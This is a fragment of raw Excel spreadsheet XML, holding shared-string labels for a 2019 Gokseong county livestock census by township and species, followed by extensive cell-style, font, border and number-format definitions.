    <t>16-4. 전체규모 가구수 및 품목별 마리수</t>
  </si>
  <si>
    <t>17-1타조 사육규모별 가구수 및 마리수</t>
  </si>
  <si>
    <t>17-2타조 연령별 성별 종별 마리수</t>
  </si>
  <si>
    <t>18-1. 오소리 규모별 가구수</t>
  </si>
  <si>
    <t>18-2. 오소리 사육 규모별 마리수</t>
  </si>
  <si>
    <t>18-3. 오소리 연령별 성별 종별 마리수</t>
  </si>
  <si>
    <t>19-1. 꿩 사육규모별 가구수</t>
  </si>
  <si>
    <t>※ 본 자료는 공표되지 않은 통계로서 행정기관 내부자료로만 활용할 수 있음.</t>
  </si>
  <si>
    <t>계</t>
  </si>
  <si>
    <t>두수</t>
  </si>
  <si>
    <t>두수</t>
  </si>
  <si>
    <t>두수</t>
  </si>
  <si>
    <t>오리</t>
  </si>
  <si>
    <t>닭</t>
  </si>
  <si>
    <t>돼지</t>
  </si>
  <si>
    <t>젖소</t>
  </si>
  <si>
    <t>한(육)우</t>
  </si>
  <si>
    <t>총계</t>
  </si>
  <si>
    <t>시군별</t>
  </si>
  <si>
    <t>2019년도 주요 가축 행정 통계 조사 결과(하반기)</t>
  </si>
  <si>
    <t>곡성읍</t>
  </si>
  <si>
    <t>오곡면</t>
  </si>
  <si>
    <t>삼기면</t>
  </si>
  <si>
    <t>석곡면</t>
  </si>
  <si>
    <t>목사동면</t>
  </si>
  <si>
    <t>죽곡면</t>
  </si>
  <si>
    <t>고달면</t>
  </si>
  <si>
    <t>옥과면</t>
  </si>
  <si>
    <t>입면</t>
  </si>
  <si>
    <t>겸면</t>
  </si>
  <si>
    <t>오산면</t>
  </si>
  <si>
    <t>농가수</t>
  </si>
  <si>
    <t>농가수</t>
  </si>
  <si>
    <t>(단위 : 호, 마리수)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</si>
</sst>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₩&quot;* #,##0_ ;_ &quot;₩&quot;* \-#,##0_ ;_ &quot;₩&quot;* &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="177" formatCode="_ * #,##0_ ;_ * \-#,##0_ ;_ * &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="178" formatCode="_ &quot;₩&quot;* #,##0.00_ ;_ &quot;₩&quot;* \-#,##0.00_ ;_ &quot;₩&quot;* &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="179" formatCode="_ * #,##0.00_ ;_ * \-#,##0.00_ ;_ * &quot;-&quot;??_ ;_ @_ "/>
    <numFmt numFmtId="180" formatCode="mm&quot;월&quot;\ dd&quot;일&quot;"/>
    <numFmt numFmtId="181" formatCode="#,##0_ "/>
    <numFmt numFmtId="182" formatCode="#,##0_);[Red]\(#,##0\)"/>
    <numFmt numFmtId="183" formatCode="0_ "/>
    <numFmt numFmtId="184" formatCode="0_);\(0\)"/>
    <numFmt numFmtId="185" formatCode="0_);[Red]\(0\)"/>
    <numFmt numFmtId="186" formatCode="&quot;₩&quot;#,##0;[Red]&quot;₩&quot;&quot;₩&quot;\-#,##0"/>
    <numFmt numFmtId="187" formatCode="&quot;₩&quot;#,##0.00;[Red]&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0.00"/>
    <numFmt numFmtId="188" formatCode="&quot;₩&quot;#,##0;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0"/>
    <numFmt numFmtId="189" formatCode="&quot;₩&quot;#,##0.00;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;&quot;₩&quot;\-#,##0.00"/>
    <numFmt numFmtId="190" formatCode="&quot;R$&quot;#,##0.00;&quot;R$&quot;\-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78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1"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="바탕"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="뼻뮝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2"/>
      <name val="Arial"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="돋움"/>
      <family val="3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4"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="8"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="12"/>
      <color indexed="10"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color indexed="30"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color indexed="10"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <name val="Tahoma"/>
      <family val="2"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="13"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <name val="돋움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b/>
      <sz val="10"/>
      <color indexed="10"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="13"/>
      <color indexed="8"/>
      <name val="굴림"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="13"/>
      <color indexed="8"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <color indexed="10"/>
      <name val="굴림체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b/>
      <sz val="12"/>
      <color rgb="FFFF0000"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color rgb="FFFF0000"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="13"/>
      <color rgb="FF000000"/>
      <name val="굴림"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="13"/>
      <color rgb="FF000000"/>
      <name val="바탕체"/>
      <family val="1"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <color rgb="FFFF0000"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="8"/>
      <name val="바탕체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>
        <color rgb="FF000000"/>
      </left>
      <right style="dotted">
        <color rgb="FF000000"/>
      </right>
      <top style="dotted">
        <color rgb="FF000000"/>
      </top>
      <bottom>
        <color indexed="63"/>
      </bottom>
    </border>
    <border>
      <left style="dotted">
        <color rgb="FF000000"/>
      </left>
      <right style="dotted">
        <color rgb="FF000000"/>
      </right>
      <top>
        <color indexed="63"/>
      </top>
      <bottom>
        <color indexed="63"/>
      </bottom>
    </border>
    <border>
      <left style="dotted">
        <color rgb="FF000000"/>
      </left>
      <right style="dotted">
        <color rgb="FF000000"/>
      </right>
      <top>
        <color indexed="63"/>
      </top>
      <bottom style="dotted">
        <color rgb="FF000000"/>
      </bottom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>
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="177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9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3" applyNumberFormat="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="190" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="190" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="190" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="190" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="190" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="190" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="190" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="190" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="190" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="190" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="190" fontId="0" fillId="0" borderId="0">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="58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12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62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31" borderId="3" applyNumberFormat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10" applyNumberFormat="0" applyFill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70" fillId="26" borderId="11" applyNumberFormat="0" applyAlignment="0" applyProtection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14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77" fontId="5" fillId="0" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="0" borderId="13" xfId="72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14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/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="0" borderId="12" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="177" fontId="8" fillId="0" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="0" borderId="13" xfId="72" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="10" fillId="0" borderId="0" xfId="72" applyFont="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="0" borderId="13" xfId="72" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="0" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="0" borderId="13" xfId="72" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="177" fontId="0" fillId="0" borderId="13" xfId="72" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="33" borderId="0" xfId="89" applyFont="1" applyFill="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="0" xfId="89">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="33" borderId="0" xfId="89" applyFill="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="34" borderId="15" xfId="89" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="35" borderId="16" xfId="89" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="36" borderId="17" xfId="89" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="20" fillId="37" borderId="18" xfId="89" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="36" borderId="18" xfId="89" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="36" borderId="19" xfId="89" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="35" borderId="20" xfId="89" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="34" borderId="21" xfId="89" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="35" borderId="21" xfId="89" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="34" borderId="22" xfId="89" applyFill="1" applyBorder="1">
      <alignment/>
      <protection/>
    </xf>
    <xf numFmtId="177" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="177" fontId="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7" fontId="21" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="0" borderId="0" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="11" fillId="38" borderId="13" xfId="0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/>
    </xf>
    <xf numFmtId="49" fontId="7" fillId="38" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="181" fontId="0" fillId="39" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="39" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="39" borderId="13" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="184" fontId="7" fillId="38" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="39" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="39" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="38" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="38" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="49" fontId="7" fillId="38" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="39" borderId="13" xfId="72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 vertical="center"/>
    </xf>
    <xf numFmtId="180" fontId="5" fillId="38" borderId="13" xfId="72" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="38" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="39" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="38" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="centerContinuous" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="39" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="39" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="0" fillId="39" borderId="13" xfId="72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 wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="35" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="33" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="35" borderId="13" xfId="72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177" fontId="5" fillId="33" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="8" fillId="0" borderId="12" xfId="72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7" fontId="5" fillId="35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77" fontId="7" fillId="35" borderId="13" xfId="72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177" fontId="7" fillId="35" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="22" fillId="0" borderId="13" xfId="72" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="22" fillId="39" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="23" fillId="0" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="23" fillId="39" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="23" fillId="33" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="23" fillId="35" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="24" fillId="0" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="39" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="0" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="39" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="177" fontId="8" fillId="0" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="40" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="8" borderId="13" xfId="72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horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="41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177" fontId="8" fillId="0" borderId="0" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="0" borderId="0" xfId="72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177" fontId="5" fillId="42" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="43" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="44" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="5" fillId="42" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="8" fillId="44" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="24" fillId="42" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="42" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="44" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="41" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="10" fillId="45" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="19" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="10" fillId="19" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="19" borderId="13" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="18" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="12" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="71" fillId="0" borderId="14" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="71" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="7" fillId="0" borderId="13" xfId="72" applyFont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vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="72" fillId="39" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="72" fillId="0" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="177" fontId="72" fillId="42" borderId="13" xfId="72" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="73" fillId="38" borderId="13" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="centerContinuous" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="74" fillId="0" borderId="26" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="justify" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="75" fillId="0" borderId="27" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="justify" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="75" fillId="0" borderId="28" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="justify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Fill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="41" fontId="30" fillId="34" borderId="29" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="41" fontId="30" fillId="34" borderId="30" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="41" fontId="30" fillId="34" borderId="31" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="41" fontId="31" fillId="13" borderId="29" xfId="73" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="41" fontId="31" fillId="13" borderId="30" xfId="73" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="41" fontId="31" fillId="13" borderId="31" xfId="73" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="41" fontId="30" fillId="42" borderId="29" xfId="73" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="41" fontId="30" fillId="42" borderId="30" xfId="73" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="32" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="41" fontId="32" fillId="0" borderId="32" xfId="73" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="33" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="41" fontId="32" fillId="0" borderId="0" xfId="73" applyNumberFormat="1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32" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="41" fontId="30" fillId="42" borderId="34" xfId="73" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="42" borderId="31" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="41" fontId="30" fillId="42" borderId="35" xfId="73" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="41" fontId="30" fillId="42" borderId="30" xfId="73" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="41" fontId="31" fillId="42" borderId="35" xfId="73" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="42" borderId="36" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="0" borderId="12" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="71" fillId="0" borderId="14" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="177" fontId="71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7" fillId="38" borderId="21" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="7" fillId="38" borderId="20" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
